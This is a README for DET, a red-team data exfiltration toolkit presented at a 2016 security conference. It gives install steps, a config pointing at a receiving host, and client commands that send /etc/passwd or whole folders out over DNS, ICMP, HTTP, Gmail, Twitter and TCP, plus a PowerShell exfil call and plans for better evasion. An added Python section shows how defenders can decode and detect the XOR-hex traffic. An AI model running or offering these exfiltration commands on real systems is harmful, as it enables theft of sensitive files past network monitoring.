
Introducing DET, (extensible) Data Exfiltration Toolkit

DET (extensible) Data Exfiltration Toolkit

DET (provided AS IS) is a proof of concept for performing data exfiltration over either a single channel or multiple channels at the same time. The idea was to create a generic toolkit into which any kind of protocol or service can be plugged.

Slides

DET was presented at BSides Ljubljana on the 9th of March 2016; the slides will be available here soon.

Example usage (ICMP plugin)

Server-side:

[screenshot: server-side ICMP session]

Client-side:

[screenshot: client-side ICMP session]

Usage while combining two channels (Gmail/Twitter)

Server-side:

[screenshot: server-side Gmail/Twitter session]

Client-side:

[screenshot: client-side Gmail/Twitter session]

Installation

Clone the repo:

git clone https://github.com/sensepost/DET.git

Then:

pip install -r requirements.txt --user

Configuration

In order to use DET, you will need to configure it with your own settings (e.g. SMTP/IMAP credentials and so on). An example configuration file, config-sample.json, is provided:

{
    "plugins": {
        "http": {
            "target": "192.168.1.101",
            "port": 8080
        },
        "google_docs": {
            "target": "192.168.1.101",
            "port": 8080
        },
        "dns": {
            "key": "google.com",
            "target": "192.168.1.101",
            "port": 53
        },
        "gmail": {
            "username": "dataexfil@gmail.com",
            "password": "ReallyStrongPassword",
            "server": "smtp.gmail.com",
            "port": 587
        },
        "tcp": {
            "target": "192.168.1.101",
            "port": 6969
        },
        "twitter": {
            "username": "PaulWebSec",
            "CONSUMER_TOKEN": "XXXXXXXXX",
            "CONSUMER_SECRET": "XXXXXXXXX",
            "ACCESS_TOKEN": "XXXXXXXXX",
            "ACCESS_TOKEN_SECRET": "XXXXXXXXX"
        },
        "icmp": {
            "target": "192.168.1.101"
        }
    },
    "XOR_KEY": "THISISACRAZYKEY",
    "sleep_time": 10
}

Usage

Help usage

python det.py -h
usage: det.py [-h] [-c CONFIG] [-f FILE] [-d FOLDER] [-p PLUGIN] [-e EXCLUDE]
              [-L]

Data Exfiltration Toolkit (SensePost)

optional arguments:
  -h, --help  show this help message and exit
  -c CONFIG   Configuration file (eg. '-c ./config-sample.json')
  -f FILE     File to exfiltrate (eg. '-f /etc/passwd')
  -d FOLDER   Folder to exfiltrate (eg. '-d /etc/')
  -p PLUGIN   Plugins to use (eg. '-p dns,twitter')
  -e EXCLUDE  Plugins to exclude (eg. '-e gmail,icmp')
  -L          Server mode

Server-side:

To load every plugin:

python det.py -L -c ./config.json

To load only twitter and gmail modules:

python det.py -L -c ./config.json -p twitter,gmail

To load every plugin and exclude DNS:

python det.py -L -c ./config.json -e dns

Client-side:

To load every plugin:

python det.py -c ./config.json -f /etc/passwd

To load only twitter and gmail modules:

python det.py -c ./config.json -p twitter,gmail -f /etc/passwd

To load every plugin and exclude DNS:

python det.py -c ./config.json -e dns -f /etc/passwd

And in PowerShell (HTTP module):

PS C:/Users/user01/Desktop> . ./http_exfil.ps1
PS C:/Users/user01/Desktop> HTTP-exfil 'C:/path/to/file.exe'

Modules

So far, DET supports multiple protocols, listed here:

  • HTTP(S)
  • ICMP
  • DNS
  • SMTP/IMAP (eg. Gmail)
  • Raw TCP
  • PowerShell implementation (HTTP, DNS, ICMP, SMTP (used with Gmail))

And other "services":

  • Google Docs (Unauthenticated)
  • Twitter (Direct Messages)

Experimental modules

I am currently implementing new modules that are almost ready to ship, including:

  • Skype (95% done)
  • Tor (80% done)
  • Github (30/40% done)

Limitations

Data is not encrypted so far, only hex-encoded and XORed with the configured XOR_KEY, which can be detected and reversed if deeper analysis is done. I plan to add proper encryption soon (such as public-key cryptography).
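The hex/XOR layer described above, as an added example that is not DET's own code (the page does not show DET's exact wire framing, so this models only repeating-key XOR followed by hex encoding): it shows the encode/decode step, a cheap heuristic a defender can run over captured payloads, and why a predictable plaintext prefix gives away the key. The key and the sample line are constructed for the example.

```python
import binascii

# Constructed sample values, not taken from any real capture.
SAMPLE_KEY = b"THISISACRAZYKEY"
SAMPLE_LINE = b"root:x:0:0:root:/root:/bin/bash\n"


def xor_hex_encode(data: bytes, key: bytes) -> str:
    """Repeating-key XOR followed by hex: the obfuscation the README describes."""
    mixed = bytes(b ^ key[i % len(key)] for i, b in enumerate(data))
    return binascii.hexlify(mixed).decode("ascii")


def xor_hex_decode(payload: str, key: bytes) -> bytes:
    """Reverse of xor_hex_encode; what an analyst does once the key is known
    (e.g. read from a recovered config.json)."""
    raw = binascii.unhexlify(payload)
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(raw))


def looks_like_hex_blob(field: str, min_len: int = 32) -> bool:
    """Detection heuristic for a DNS label, URL parameter or message body:
    long, even-length and made only of lowercase hex digits. Expect false
    positives on legitimate hex (hashes, session ids); treat as a triage signal."""
    if len(field) < min_len or len(field) % 2:
        return False
    return all(c in "0123456789abcdef" for c in field)


def recover_key_from_known_plaintext(payload: str, known_prefix: bytes,
                                     key_len: int) -> bytes:
    """Why XOR is not encryption: if the first key_len bytes of the plaintext
    are predictable (a file like /etc/passwd starts with 'root:x:0:0:'),
    XORing them against the ciphertext yields the repeating key directly."""
    if len(known_prefix) < key_len:
        raise ValueError("need at least key_len bytes of known plaintext")
    raw = binascii.unhexlify(payload)[:key_len]
    return bytes(c ^ p for c, p in zip(raw, known_prefix))


if __name__ == "__main__":
    blob = xor_hex_encode(SAMPLE_LINE, SAMPLE_KEY)
    print("hex blob flagged:", looks_like_hex_blob(blob))
    print("recovered key:", recover_key_from_known_plaintext(blob, SAMPLE_LINE, 15))
    print("decoded:", xor_hex_decode(blob, SAMPLE_KEY))
```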

Roadmap

  • Compression (extremely important!)
  • Add proper encryption (eg. AES-256)
  • Proper data obfuscation and integrating Markovobfuscate
  • FTP, Flickr LSB steganography and YouTube modules

References

Some pretty cool references/credits to people whose projects inspired me:

Contact/Contributing

You can reach me on Twitter @PaulWebSec. Feel free to contribute: clone, fork, submit your PR and so on.

License

DET is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License. Permissions beyond the scope of this license may be available at info@sensepost.com
